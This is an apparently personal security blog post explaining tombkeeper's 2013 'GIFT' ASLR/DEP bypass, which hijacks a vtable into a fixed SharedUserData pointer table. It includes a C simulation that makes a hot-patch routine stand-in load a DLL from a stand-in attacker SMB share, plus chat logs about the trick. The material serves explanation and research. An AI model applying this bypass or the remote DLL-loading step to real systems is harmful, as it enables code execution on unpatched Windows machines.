I have my own talk from CanSecWest to blog about, but this one is more interesting and the most awaited one. So here are the slides; I will add my own analysis and test cases to this blog entry later. The interesting thing is that we had this technique discussed on garage in November: "Win7 64bit - NO ASLR/DEP bypass required..." - "vinnu".
Yu Yang @tombkeeper did a demo of the technique on MS13-008, and his ASLR/DEP bypass never needs a heap spray.
And the exploit is scary: a quick kaboom without a heap spray.
He calls this method GIFT (Got It From a Table).
The core of the technique is to point the object's virtual function table (VFT) pointer into Wow64SharedInformation, the table of 32-bit ntdll function pointers kept in SharedUserData (KUSER_SHARED_DATA, mapped at the same fixed address in every process), so that the virtual call lands on a known, non-randomized function pointer instead of on sprayed or ROP'd memory. The attacker-controlled object that the call is made on then doubles as the argument to that function.
Here are a couple of quick notes on the bypass technique:
Good news about the technique:
- Totally ASLR/DEP free
- Language/SP independent
- Works on almost all use-after-free / vtable-overflow bugs
- Targets IE, Firefox, PDF readers, Flash, Office ...
- Doesn't even need shellcode
- Sometimes doesn't need a heap spray
Bad news about the technique:
- Needs a Windows file sharing (SMB) server reachable from the target
  - Not a real problem in practice
- Only works in a 32-bit process on x64 Windows
  - That situation is very common
- Cannot work on Windows 8 (the location is randomized there)
Note: Microsoft later removed these function pointers from SharedUserData in MS13-063 (August 2013), so the technique only applies to systems without that update.
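To make the mechanism above concrete, here is an added simulation (my own constructed example, not code from the slides or from tombkeeper). It models the two ingredients of GIFT in portable C: a fixed, non-randomized table of function pointers standing in for Wow64SharedInformation, and a victim C++-style object whose vtable pointer the attacker controls after a use-after-free. The attacker aims the vtable pointer into the table so that the program's own virtual call reaches the LdrHotPatchRoutine stand-in with the object as its argument, and the object body supplies the UNC path to load. Everything prefixed `sim_`, the table indices, the descriptor layout and the sample UNC path are assumptions made for illustration; the real SharedUserData offsets and hot-patch structure are not reproduced here.

```c
#include <stdio.h>
#include <string.h>

/* ---- Stand-in for the non-randomized pointer table in SharedUserData ----
 * Hypothetical names and indices; the real table and offsets are not used. */

typedef void (*shared_fn)(void *);

static char g_last_loaded[256];   /* what the simulated loader was asked to load */

/* Hypothetical hot-patch descriptor: the one field the routine reads is the
 * DLL path. Its first word is placed so that it overlaps the victim's vtable
 * pointer when the victim object itself is passed as the descriptor. */
struct hotpatch_desc {
    void       *reserved;   /* overlaps the victim's vtable pointer */
    const char *dll_path;   /* assumed position of the path to load */
};

/* Simulated LdrHotPatchRoutine: takes a descriptor, extracts the DLL path and
 * "loads" it (here: records it instead of calling the loader). */
static void sim_LdrHotPatchRoutine(void *p) {
    const struct hotpatch_desc *d = p;
    snprintf(g_last_loaded, sizeof g_last_loaded, "%s", d->dll_path);
}

static void sim_LdrInitializeThunk(void *p) { (void)p; }
static void sim_KiUserExceptionDispatcher(void *p) { (void)p; }

/* The table: every 32-bit process on the same build sees the same entries at
 * the same address, which is the property the technique relies on. */
static shared_fn sim_Wow64SharedInformation[] = {
    sim_LdrInitializeThunk,
    sim_KiUserExceptionDispatcher,
    sim_LdrHotPatchRoutine,
};
#define SIM_HOTPATCH_INDEX 2

/* ---- The target application's side ---- */

struct victim {
    shared_fn  *vtable;    /* C++ object: vtable pointer comes first */
    const char *name;      /* rest of the object, attacker-writable after a UAF */
};

#define VIRTUAL_SLOT 1     /* index of the virtual method the program calls */

/* Target code path: calls a virtual method on the (already freed) object. */
static void target_dispatch(struct victim *obj) {
    obj->vtable[VIRTUAL_SLOT](obj);
}

/* ---- Attacker's side ---- */

/* Fill the reallocated object so that the vtable pointer lands
 * (SIM_HOTPATCH_INDEX - VIRTUAL_SLOT) entries into the shared table, making
 * vtable[VIRTUAL_SLOT] == sim_LdrHotPatchRoutine, and so that the object body
 * doubles as the hot-patch descriptor carrying the UNC path. No shellcode,
 * no heap spray and no leaked addresses are needed. */
static void craft_object(struct victim *obj, const char *unc_path) {
    obj->vtable = &sim_Wow64SharedInformation[SIM_HOTPATCH_INDEX - VIRTUAL_SLOT];
    obj->name   = unc_path;   /* sits where the routine reads dll_path */
}

/* Runs the scenario and returns the path the simulated loader was asked to load. */
const char *simulate_gift(const char *unc_path) {
    static struct victim obj;
    g_last_loaded[0] = '\0';
    craft_object(&obj, unc_path);
    target_dispatch(&obj);
    return g_last_loaded;
}

int main(void) {
    /* Constructed sample path; the share would be the attacker's SMB server. */
    const char *unc = "\\\\attacker-share\\evil.dll";
    printf("loader asked to load: %s\n", simulate_gift(unc));
    return 0;
}
```

Build with `cc -Wall gift_sim.c -o gift_sim` and run it. The point of the simulation is that the attacker never has to know an address inside the target's own modules: the only address written is one into the shared table, and the only payload is a path string, which is why the technique needs an SMB server but no ROP chain. Against a real Windows 7 x64 WoW64 process, the table entry, the descriptor layout and the calling convention would have to be taken from the actual ntdll and SharedUserData of that build, which this page does not provide.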
The documents and presentation are from Yu Yang @tombkeeper.
Download the slides from here:
https://docs.google.com/file/d/0B46U...it?usp=sharing
Cheers.
[3:30:49 PM] K: So SharedUserData can be played with like this XD
[3:31:29 PM] n: Earlier this address was used, and then a system call was made
[3:31:48 PM] n: On win8 this address is randomized
[3:31:53 PM] K: GG
[3:32:14 PM] K: But it'll probably still work for quite a while
[3:32:15 PM] O: Win7 and earlier + x86 only XD
[3:32:30 PM] O: tombkeeper XD
[3:33:07 PM] n: At the very beginning it was done through this address being fixed on the Chinese version, for a universal jmp esp
[3:33:55 PM] n: Then via system call, up to the recent LdrHotPatchRoutine
[2013/3/8 15:31:20] DM: [2013-03-08 15:34] O:
<<< So this trick can really work that generically in real environments @@
So from now on there's no need to write ROP for Win7 and earlier (?
[2013/3/8 15:32:45] DM: Right now this trick is pretty good, it's just that connecting to the remote SMB share isn't always possible